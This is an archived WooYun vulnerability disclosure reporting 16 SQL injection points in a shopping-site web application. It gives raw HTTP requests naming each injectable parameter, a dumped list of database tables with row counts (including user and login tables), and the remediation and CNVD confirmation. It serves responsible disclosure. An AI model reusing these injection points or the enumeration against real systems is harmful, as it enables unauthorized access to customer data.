乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-01: 细节已通知厂商并且等待厂商处理中 2015-12-04: 厂商已经确认,细节仅向厂商公开 2015-12-14: 细节向核心白帽子及相关领域专家公开 2015-12-24: 细节向普通白帽子公开 2016-01-03: 细节向实习白帽子公开 2016-01-18: 细节向公众公开
16处注入打包
1#http://**.**.**.**/icarttw/help/shoppingCartAllRowzbin.action?yhid=5672680&_=1448764540382
2#
POST /icarttw/userZhmm.action HTTP/1.1Content-Length: 57Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://**.**.**.**/Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*dlzh=1
3#
http://**.**.**.**/shoppingCartAllRowzbin.action?yhid=5672680&_=1448766096973
4#
POST /icarttw/checksxkzbin.action HTTP/1.1Content-Length: 14Content-Type: application/x-www-form-urlencodedReferer: http://**.**.**.**/Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*nickname=1
5#
GET /icarttw/help/shoppingCartAllRowzbin.action?yhid=1&_=1448764540382 HTTP/1.1Referer: http://**.**.**.**/Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*
6#
GET /icarttw/newscount.action?userKey=1 HTTP/1.1Referer: http://**.**.**.**/Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*
7#
POST /icarttw/search/searchdy HTTP/1.1Content-Length: 15Content-Type: application/x-www-form-urlencodedReferer: http://**.**.**.**/Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*flid=0&pm=1
8#
GET /icarttw/search/searchdy.action?flid=0&page=2&pm=1 HTTP/1.1Referer: http://**.**.**.**/Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*
9#
POST /icarttw/showpj.action HTTP/1.1Content-Length: 19Content-Type: application/x-www-form-urlencodedReferer: http://**.**.**.**/Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*page=1&spxxid=1
10#
POST /icarttw/showsd.action HTTP/1.1Content-Length: 19Content-Type: application/x-www-form-urlencodedReferer: http://**.**.**.**/Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*page=1&spxxid=1
#11
GET /icarttw/search/searchyx.action?page=2&pm=1&yxjz=2 HTTP/1.1Referer: http://**.**.**.**/Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*
12#
GET /icarttw/search/searchyx?pm=1&yxjz=0 HTTP/1.1Referer: http://**.**.**.**/Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*
13#
POST /icarttw/userZhmm.action HTTP/1.1Content-Length: 10Content-Type: application/x-www-form-urlencodedReferer: http://**.**.**.**/Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*dlzh=1
14#
GET /shoppingCartAllRowzbin.action?yhid=1&_=1448766096973 HTTP/1.1Referer: http://**.**.**.**/Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*
15#
POST /showpj.action HTTP/1.1Content-Length: 19Content-Type: application/x-www-form-urlencodedReferer: http://**.**.**.**/Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*page=1&spxxid=1
16#
POST /showsd.action HTTP/1.1Content-Length: 19Content-Type: application/x-www-form-urlencodedReferer: http://**.**.**.**/Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*page=1&spxxid=1
Database: EXCHANGE+----------------------------+---------+| Table | Entries |+----------------------------+---------+| JT_WEBG_GYSSPMX | 3078001 || JT_WEBG_CGSHMX | 2372075 || JT_UPDATEUSERLOG_0904 | 2059741 || JT_J_SPXX | 1793591 || JT_J_SPXXSJBACK | 1717493 || XWQ_JT_J_SPXX_KC | 1415286 || JT_WEBG_GYSSPTZ | 1401730 || JT_J_SPXX_TP | 1243834 || XWQ_JT_J_SPXX | 1201511 || JT_WEBG_JTDMX | 1151380 || JT_J_SPXX20110512 | 912994 || JT_J_SPXX_2010_12_29 | 867858 || JT_J_SPXX_2010_12_30 | 867858 || HW_SPXX | 761691 || JT_J_SPXX_0201 | 739357 || SYSLOG | 609240 || TJBB_XSDMX | 401788 || JT_J_SPXX_KC | 390568 || JT_WEBK_XSDMX | 374935 || TJBB_FHDMX | 364391 || XWQ_SPXX2 | 337555 || JT_WEBG_CGSH | 331392 || TJBB_UPLOAD_TEMP_PRODUCTS | 320666 || JT_C_BMSPKFMX | 199028 || JT_J_SPXX_BM | 174764 || JT_C_BMSPKFTZ | 168671 || JT_UPDATEUSERLOG0908 | 166571 || T_LLJL | 166160 || TJBB_ZTSP | 165042 || JKXX_TJBB_XSDMX_BACK | 157737 || TJBB_XSZFRZ | 153738 || JT_WEBK_KHSPTZ | 150463 || TJBB_MANAGEDBLOG | 130298 || JT_J_SJHIS | 114881 || JT_WEBG_JTD | 114732 || JT_J_SPXX_BACK | 111700 || TJBB_XSD | 105825 || JT_J_SPXX_SPJJ | 99378 || TJBB_FHD | 94758 || JT_UPDATEUSERLOG_0903 | 83098 || TJBB_USERSXK | 77705 || TJBB_DXFSRZ | 72353 || TJBB_YXHD_PRODUCTS | 68317 || TJBB_USER | 65396 || HASSENDSMS | 45537 || JT_WEBK_USER | 35995 || JT_WEBG_CGDMX | 34597 || TJBB_DDSHR | 31556 || TJBB_FJDH | 28510 || TJBB_XSDQXTZ | 22693 || JT_WEBK_GGDJXX | 22258 || TEMP_RXSP1 | 21285 || T_SHDZ | 20560 || JT_WEBG_GYSJSDMX | 19914 || T_SHDZTMP | 18144 || T_SCJ | 18019 || TJBB_DTKRZ | 17548 || TJBB_KZSXNR | 16852 || CHECK_LOGIN | 16677 || T_GWC | 15047 || TJBB_TKRZ | 14090 || TJBB_DTK | 13983 || SPXX_TGTEMP | 13512 |
参数化查询,或waf
危害等级:中
漏洞Rank:10
确认时间:2015-12-04 11:44
CNVD确认所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。
暂无